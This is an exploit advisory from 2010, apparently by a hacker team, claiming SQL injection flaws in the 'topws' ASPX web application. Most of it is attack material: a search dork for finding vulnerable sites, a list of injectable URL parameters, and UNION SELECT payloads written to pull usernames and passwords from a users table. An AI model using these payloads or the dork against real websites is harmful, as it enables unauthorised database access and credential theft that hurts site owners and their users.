topws  (.aspx) Multiple Sql Injection Vulnerability
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Team           : Sec Attack Team

.:. Home           : www.sec-attack.com/vb

.:. Script         : topws

.:. Language       : aspx

.:. Script Download: http://www.topwnet.com/

.:. Bug Type       : Sql Injection[Mysql]

.:. Dork           : "Site powered By  Topws.com"

.:. Date           : 31/1/2010

####################################################################

===[ Exploit ]===

www.Localhost.com/show_medical_articles_details.aspx?mid=[Sql Injection]
www.Localhost.com/show_news_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_photogallery_details.aspx?cid=[Sql Injection]
www.Localhost.com/show_page.aspx?pid=[Sql Injection]
www.Localhost.com/show_events_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_courses_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/marquee_details.aspx?mid=[Sql Injection]
www.Localhost.com/show_consultations_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_prev_courses_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_consultations_details.aspx?id=[Sql Injection]
www.Localhost.com/show_members_detail.aspx?id=[Sql Injection]
www.Localhost.com/show_forum_pics.aspx?id=[Sql Injection]
www.Localhost.com/similar.aspx?pid=[Sql Injection]
www.Localhost.com/news.aspx?pid=[Sql Injection]
www.Localhost.com/show_similar.aspx?id[Sql Injection]
www.Localhost.com/showdtls.aspx?id=[Sql Injection]
www.Localhost.com/show_medical_articles_details_ar.aspx?mid=[Sql Injection]&home=y
www.Localhost.com/show_box_details.aspx?bid=[Sql Injection]
www.Localhost.com/show_istshareen.aspx?id=[Sql Injection]
ETC..........
***********************************************************************************

===[ ERROR ]====

Syntax error in string in query expression '[id]=''.

***********************************************************************************

*************************************************************************************
########           Name TableName : users
EXPLOIT|              Name ColumnName: Id,Username,Password
########
null+union+select+1,username,3,4,password,6,7,8+from+users+where+id=1
null+union+select+1,username,3,password+from+users+where+id=1
null+union+select+username,2,password+from+users+where+id=1
ETC..........
*************************************************************************************

####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.<https://signup.live.com/signup.aspx?id=60969>